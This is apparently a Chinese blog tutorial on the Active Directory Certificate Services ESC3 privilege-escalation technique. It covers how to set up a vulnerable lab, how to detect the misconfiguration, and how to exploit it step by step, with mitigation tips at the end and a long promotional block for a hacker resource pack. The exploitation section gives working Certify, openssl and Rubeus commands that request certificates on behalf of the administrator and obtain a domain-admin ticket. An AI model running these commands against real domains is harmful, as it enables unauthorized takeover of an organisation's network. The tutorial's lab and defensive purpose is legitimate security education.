一、漏洞原理:听说证书也能“搞事情”? 🔑
ADCS 的 ESC3 漏洞,说白了就是利用 ADCS 证书模板配置上的小疏忽,搞一波权限提升的大动作。简单来说,就是通过证书请求代理 EKU 来“瞒天过海”,最终实现权限提升。这个过程就像是玩了一场“狸猫换太子”的游戏,只不过我们换的是权限!
攻击分为两步走:
- 第一步: 低权限用户先用“障眼法”,申请一个包含证书请求代理 EKU 的证书。这就像是拿到了一个“通行证”。
- 第二步: 拿着这个“通行证”,冒充高权限用户去申请另一个证书,最终的目标是——拿下域管理员权限!
二、漏洞利用条件:想要“搞事情”,先看你有没有“入场券” 🛠️
想要成功利用 ESC3 漏洞,需要满足一些前提条件,也就是拿到“入场券”:
模板一配置要求:
- 证书注册权限: 必须是“Authenticated Users”(经过身份验证的用户)。也就是说,只要是域内的合法用户,都有资格来“掺和”一下。
- 应用策略: 必须包含“证书申请代理”。这是关键,有了它,才能冒充别人去申请证书。
- 使用者名称: 必须是“用户主体名称”。
模板二配置要求:
- 证书注册权限: 同样是“Authenticated Users”。
- 应用策略: 必须包含“客户端身份验证”和“智能卡登录”。
- 使用者名称: 必须是“用户主体名称”。
三、漏洞环境构造:手把手教你搭建“舞台” 🔧
想要“唱戏”,总得有个“舞台”吧?下面就来手把手教你搭建 ESC3 漏洞的“舞台”:
配置证书模板一
安全
将 "Authenticated Users" 加入注册权限,让大家都有“参与感”。
使用者名称
选择用 AD 中的信息生成,并且勾选“用户主体名称”。
扩展
选择应用程序策略,将策略设置为“证书申请代理”。
配置证书模板二
在 ADCS 服务器中运行 certtmpl.msc
打开证书模板控制台,右键复制“工作站身份验证”。
常规
把模板名称改成“ESC32”,方便我们识别。
安全
同样,将 "Authenticated Users" 加入注册权限。
使用者名称
选择用 AD 中的信息生成,勾选“用户主体名称”。
扩展
选择应用程序策略,确保包含“客户端身份验证”和“智能卡登录”。
发布要求
发布证书模板
打开 certsrv.msc
,在证书颁发机构中的证书模板上右键点击,选择“新建” -> “要颁发的证书模板”,选择我们新复制的模板“ESC32”并确定添加。
四、漏洞环境检测:看看你的“舞台”搭好了没? 🔍
“舞台”搭好了,总得测试一下,看看是不是真的能用吧?
使用 Certify 工具来检测是否存在证书配置错误:
Certify.exe find /vulnerable
如果出现以下情况,就说明你的“舞台”搭建成功了,可以开始“表演”了:
- mspki-certificate-application-policy: 证书申请代理
- Enrollment Rights: Authenticated Users 可获取证书
满足以上条件,就可以利用证书漏洞,伪装成域管理员,获取更高的权限啦!
五、漏洞利用:开始你的“表演”! 🔮
现在,让我们开始真正的“表演”!
在普通域用户下,使用 Certify.exe 以 administrator 身份申请 ESC3 证书:
Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC3 /altname:administrator
将申请的证书复制保存为 esc3.pem
,然后使用 openssl 转换成 esc3.pfx
,密码可以留空:
openssl pkcs12 -in esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3.pfx
通过 esc3.pfx
获取 ESC32 证书:
Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC32 /onbehalfof:lutraadministrator /enrollcert:esc3.pfx
将申请的证书复制保存为 esc32.pem
,再次使用 openssl 转换成 esc32.pfx
,密码同样留空:
openssl pkcs12 -in esc32.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc32.pfx
最后,使用 Rubeus 请求域管 administrator 的 TGT:
Rubeus.exe asktgt /user:administrator /certificate:esc32.pfx /dc:192.168.110.127 /ptt
如果一切顺利,你就可以成功导入域管 TGT 票据,摇身一变,成为拥有至高无上权力的域管理员!
导入票据后,你就已经拥有了访问域控目录的权限,可以为所欲为啦!
六、总结:安全无小事,防患于未然! ⚠️
ESC3 漏洞利用了证书颁发过程中的配置错误,通过两个特定模板的配置不当,最终实现了权限提升。这再次提醒我们,安全无小事,一个小小的配置疏忽,就可能导致整个系统的沦陷!
修复建议:
- 严格控制证书模板的注册权限, 不要让“闲杂人等”也能随意注册证书。
- 禁止不必要的证书申请代理策略, 避免被恶意用户利用。
- 确保 CA 服务器的配置安全, 定期检查配置,及时发现并修复潜在的安全隐患。
- 及时修补 ADCS 服务相关漏洞, 不要让漏洞成为黑客的“后花园”。
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************